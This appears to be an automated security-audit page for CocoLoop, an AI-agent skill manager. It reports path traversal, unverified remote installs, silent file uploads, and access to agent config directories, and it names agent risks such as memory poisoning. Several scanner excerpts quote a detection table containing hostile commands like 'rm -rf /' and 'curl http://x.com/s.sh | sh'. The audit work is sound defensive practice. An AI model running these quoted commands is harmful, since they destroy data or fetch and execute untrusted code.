Back to skill

Security audit

CocoLoop

Security checks for vulnerabilities and agentic risk

Overview

Cocoloop is a coherent skill manager, but its installer and scanner handle remote packages, local files, and deletion with too little containment or confirmation.

Review before installing. Use this only if you are comfortable with a tool that can download skills, write them into agent-loaded directories, uninstall them, and upload local files for scanning. Avoid installing from untrusted URLs, avoid --force unless you have checked the destination paths, and do not run safescan on sensitive files unless you intend to upload them to the configured service.

Vulnerability Patterns
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (4)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/lib/common.sh:20
Finding

Unvalidated skill names enable path traversal, arbitrary file placement, and recursive deletion

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Error
Location
scripts/lib/install.sh:243
Finding

Untrusted archives are extracted without validating member paths or link targets

Content
View full analysis
Remediation
View remediation

T03 · Remote Payload Retrieval and Execution

Error
Location
scripts/lib/install.sh:243
Finding

Mutable remote skill content is installed without integrity or authenticity verification

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/lib/safescan.sh:40
Finding

SafeScan transmits complete local files without explicit upload confirmation or endpoint disclosure

Content
View full analysis
&2 return 1 } curl --silent --show-error --location --max-time "$(cocoloop_api_timeout)" \ -X POST "$(cocoloop_api_base_url)/safescan/upload" \ -F "upload_type=file" \ -F "snowflake_id=${snowflake_id}" \ -F "file=@${file_path}" } ``` The CLI selects upload behavior solely based on whether the target is a local file: ```bash cocoloop::command::safescan() { local target="$1" if [[ -f "$target" ]]; then cocoloop_safescan_upload_file "$target" elif [[ -d "$target" ]]; then cocoloop_safescan_upload_directory "$target" else cocoloop_safescan_report "$target" fi } ``` The destination is configurable: ```bash cocoloop_api_base_url() { printf '%s\n' "${COCOLOOP_API_BASE_URL:-https://api.cocoloop.cn/api/v1}" } ``` ### Technical Analysis Running `safescan ` uploads the complete contents of that file to the configured API. There is no separate `--upload` option, confirmation prompt, content preview, secret detection, file-size restriction, or destination display. The behavior is related to remote scanning, but the command name does not distinguish a local scan from disclosure to a third-party service. A user or Agent may consequently supply a sensitive path while expecting local analysis. The destination can be changed through `COCOLOOP_API_BASE_URL`, including to an attacker-controlled or plaintext HTTP endpoint. The upload also uses `curl --location`, allowing redirects without a destination-host policy. Directory handling sends the directory path string rather than directly attaching ev ...[truncated 1479 chars]
Remediation
View remediation
Vulnerability Patterns
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • YARA SignaturesMalware Match, Webshell Match, Cryptominer Match
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (99)

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding

描述强调 CLI 的职责应很窄:只做网络 API 包装和已知安装流程包装,搜索判断、fallback 探索、复杂编排由 Agent 完成。但代码明显承担了这些被排除的职责。尤其是 search 命令会并发执行官方 API 搜索和本地搜索、输出结构化结果、判断是否无结果、判断 exact match、判断是否存在跨 agent 迁移候选,并在无结果时生成多个 fallback 站点 URL 和 next-step 建议。这已不是单纯 wrapper,而是实质性的决策与编排逻辑。除此之外,代码还实现了本地会话/安装状态管理、更新流程、点赞列表回退、本地/远程路径展示以及 safescan 安全扫描接口,能力范围显著大于声明。因此描述与实际行为存在明显不一致。

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
96% confidence
Finding

声明描述的是一个 Skill 管理器型 CLI,重点是 API wrapper 与安装流程 wrapper;但此代码块实际提供的是 SafeScan 功能集合,包含扫描报告查询、批量哈希存在性检查,以及将本地文件或目录发送到远程服务。这些能力明显超出了“Skill 管理器/安装流程封装”的直观范围,且其主要目的更接近安全扫描上传与查询,而不是 Skill 管理。虽然它确实属于某种 API wrapper,但访问和上传本地文件/目录到扫描端点是声明中未体现的实质能力,因此应判定为描述与行为不匹配。

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding

声明强调 CLI 只负责网络 API wrapper 和已知安装流程 wrapper,复杂决策由 Agent 完成;但该代码片段的核心行为是本地卸载与清理:枚举多个技能安装目录,按 scope 筛选,并对存在的目录或符号链接执行递归删除,还会删除内部 store 并更新安装状态。这不是简单的网络 API 封装,也不属于安装流程 wrapper,而是具有破坏性的本地卸载能力。该能力和所访问的资源范围(项目目录、用户主目录下多种技能路径、内部存储)都未在声明中准确体现,因此存在明显描述与行为不一致。

Content

No source excerpt is available for this finding.

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 16)May include surrounding context.

md
4. 尽量保留原始目录结构:`SKILL.md`、`scripts/`、`references/`、`assets/`、`agents/`。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 140)May include surrounding context.

md
4. 尽量保留原始目录结构:`SKILL.md`、`scripts/`、`references/`、`assets/`、`agents/`。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 169)May include surrounding context.

md
4. 尽量保留原始目录结构:`SKILL.md`、`scripts/`、`references/`、`assets/`、`agents/`。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 244)May include surrounding context.

md
4. 尽量保留原始目录结构:`SKILL.md`、`scripts/`、`references/`、`assets/`、`agents/`。

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 253)May include surrounding context.

md
4. 尽量保留原始目录结构:`SKILL.md`、`scripts/`、`references/`、`assets/`、`agents/`。

Agent Config Directory Access

High
Category
Agent Snooping
Confidence
93% confidence
Finding

The skill explicitly instructs installation into agent configuration and skill directories such as ~/.codex/config.toml, .agents/skills, and other platform-specific paths. In context, this is more dangerous because the skill is an installer/manager: modifying agent config locations can persist behavior, alter what code the agent loads, and create a persistence foothold across future sessions or projects.

Content

Scanner excerpt · SKILL.md (reported line 100)May include surrounding context.

md
| 平台 | 项目级目录 | 用户级目录 | 兼容目录 | 配置示范 |
| --- | --- | --- | --- | --- |
| OpenCode | `.opencode/skills/<skill-name>/` | `~/.config/opencode/skills/<skill-name>/` | `.claude/skills/<skill-name>/`、`.agents/skills/<skill-name>/` 也可被 OpenCode 发现 | `opencode.json` / `~/.config/opencode/opencode.json` |
| Codex | `.agents/skills/<skill-name>/` | `$HOME/.agents/skills/<skill-name>/` | `$HOME/.codex/skills/<skill-name>/` | `~/.codex/config.toml` |
| Claude Code | `.claude/skills/<skill-name>/` | `~/.claude/skills/<skill-name>/` | 无必需兼容目录 | `~/.claude/settings.json` / `.claude/settings.json` |
| OpenClaw | `skills/<skill-name>/` 或 `.agents/skills/<skill-name>/` | `~/.agents/skills/<skill-name>/` 或 `~/.openclaw/skills/<skill-name>/` | `~/.openclaw/skills/<skill-name>/` | `~/.openclaw/openclaw.json` |
| Molili | 无独立项目级目录,直接使用用户级 active skills 目录 | macOS/Linux: `~/.molili/workspaces/default/active_skills/<skill-name>/`;Windows: `\\.molili\\workspaces\\default\\active_skills\\<skill-name>\\` | 无额外兼容目录 | 以 `active_skills` 目录为准 |

Agent Config Directory Access

High
Category
Agent Snooping
Confidence
93% confidence
Finding

Referencing and potentially modifying files like ~/.claude/settings.json exposes sensitive agent configuration state and enables persistence or behavioral manipulation. Because this skill's purpose is to install and publish skills into active agent ecosystems, access to these config paths materially increases the blast radius if the workflow is misused or if an untrusted skill is installed.

Content

Scanner excerpt · SKILL.md (reported line 101)May include surrounding context.

md
| --- | --- | --- | --- | --- |
| OpenCode | `.opencode/skills/<skill-name>/` | `~/.config/opencode/skills/<skill-name>/` | `.claude/skills/<skill-name>/`、`.agents/skills/<skill-name>/` 也可被 OpenCode 发现 | `opencode.json` / `~/.config/opencode/opencode.json` |
| Codex | `.agents/skills/<skill-name>/` | `$HOME/.agents/skills/<skill-name>/` | `$HOME/.codex/skills/<skill-name>/` | `~/.codex/config.toml` |
| Claude Code | `.claude/skills/<skill-name>/` | `~/.claude/skills/<skill-name>/` | 无必需兼容目录 | `~/.claude/settings.json` / `.claude/settings.json` |
| OpenClaw | `skills/<skill-name>/` 或 `.agents/skills/<skill-name>/` | `~/.agents/skills/<skill-name>/` 或 `~/.openclaw/skills/<skill-name>/` | `~/.openclaw/skills/<skill-name>/` | `~/.openclaw/openclaw.json` |
| Molili | 无独立项目级目录,直接使用用户级 active skills 目录 | macOS/Linux: `~/.molili/workspaces/default/active_skills/<skill-name>/`;Windows: `\\.molili\\workspaces\\default\\active_skills\\<skill-name>\\` | 无额外兼容目录 | 以 `active_skills` 目录为准 |

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/cocoloop-safe-check.md (reported line 36)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/cocoloop-safe-check.md (reported line 66)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 108)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 111)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 149)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
90% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/cocoloop-safe-check.md (reported line 36)May include surrounding context.

md
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

YARA rule 'agent_skill_destructive_autonomous_actions': Autonomous destructive filesystem, shell history, or repository actions in AI agent skills [agent_skills]

High
Category
YARA Match
Confidence
75% confidence
Finding

YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).

Content

Scanner excerpt · references/cocoloop-safe-check.md (reported line 36)May include surrounding context.

md
### A 级
- 代码安全规范
- 依赖版本锁定
- 无动态代码加载
- 允许 T3 来源

### B 级
- 无 C/D 级问题
- 存在改进空间

### C 级
- 存在潜在安全漏洞
- 硬编码敏感信息

### D 级(一票否决)
- 使用 eval() 执行不可信网络代码
- 存在 SQL 注入、命令注入等明显漏洞
- 未经确认上传本地文件到远程(T3 来源)
- 执行 rm -rf / 等系统破坏性命令

## 检查维度

### 1. 代码安全性检查

**D级触发项**:
- 使用 `eval()` 执行不可信网络代码
- 使用 `exec()`、`system()` 执行未过滤的用户输入
- 存在 SQL 注入、命令注入、XSS 等明显漏洞
- 存在已知的严重 CVE 漏洞

**C级触发项**:
- 存在潜在的安全漏洞(路径遍历、不安全的反序列化)
- 硬编码敏感信息(密码、API Key、Token)

### 2. 数据隐私性检查

**D级触发项**:
- 未经用户确认上传本地文件到远程(T3 来源)
- 静默收集密码、密钥�

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
85% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/cocoloop-safe-check.md (reported line 66)May include surrounding context.

md
### 3. 执行安全性检查

**D级触发项**:
- 执行 `rm -rf /` 或类似系统破坏性命令
- 无确认直接执行系统级危险操作
- 修改系统关键配置且无备份机制

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
85% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 111)May include surrounding context.

md
### 3. 执行安全性检查

**D级触发项**:
- 执行 `rm -rf /` 或类似系统破坏性命令
- 无确认直接执行系统级危险操作
- 修改系统关键配置且无备份机制

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
85% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 149)May include surrounding context.

md
### 3. 执行安全性检查

**D级触发项**:
- 执行 `rm -rf /` 或类似系统破坏性命令
- 无确认直接执行系统级危险操作
- 修改系统关键配置且无备份机制

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/operations-manual.md (reported line 170)May include surrounding context.

git status --short git add <需要发布的文件> git commit -m "" git push origin main

text

如果有本地维护手册、测试文件或临时产物,确认它们已经被 `.gitignore` 排除。

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
70% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/operations-manual.md (reported line 170)May include surrounding context.

git status --short git add <需要发布的文件> git commit -m "" git push origin main

text

如果有本地维护手册、测试文件或临时产物,确认它们已经被 `.gitignore` 排除。

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
78% confidence
Finding

The guide allows T3-source pre-installation checks to be bypassed with a '--skip-check' parameter. Because T3 is explicitly the least trusted source tier, documenting a straightforward bypass of recommended safety review weakens a key control and can lead users to install unreviewed, potentially malicious skills.

Content

Scanner excerpt · references/safety-check-guide.md (reported line 9)May include surrounding context.

md
1. **安装前检查**(推荐)
   - 用户明确请求:"检查 xxx 安全"
   - 来源为 T3 且用户未使用 --skip-check 参数

2. **安装后检查**
   - 安装完成后询问用户是否需要检查

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
85% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/safety-check-guide.md (reported line 108)May include surrounding context.

md
| --------------- | -------------------- | ------------------------------ |
| `eval\s*\(`     | 使用 eval 执行代码   | `eval(userInput)`              |
| `exec\s*\(`     | 使用 exec 执行命令   | `exec(userCommand)`            |
| `system\s*\(`   | 使用 system 执行命令 | `system("rm -rf /")`           |
| `child_process` | 引入 child_process   | `require('child_process')`     |
| `spawn\s*\(`    | 使用 spawn 执行命令  | `spawn('sh', ['-c', cmd])`     |
| `rm\s+-rf\s+/`  | 系统破坏性命令       | `rm -rf /`                     |

External Script Fetching

High
Category
Supply Chain
Confidence
90% confidence
Finding

Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Content

Scanner excerpt · references/safety-check-guide.md (reported line 112)May include surrounding context.

md
| `child_process` | 引入 child_process   | `require('child_process')`     |
| `spawn\s*\(`    | 使用 spawn 执行命令  | `spawn('sh', ['-c', cmd])`     |
| `rm\s+-rf\s+/`  | 系统破坏性命令       | `rm -rf /`                     |
| `curl.*\|.*sh`  | 管道执行远程脚本     | `curl http://x.com/s.sh \| sh` |
| `fetch.*eval`   | 下载并执行代码       | `fetch(url).then(r=>eval(r))`  |

**C级触发项:**

Static analysis

No suspicious patterns detected.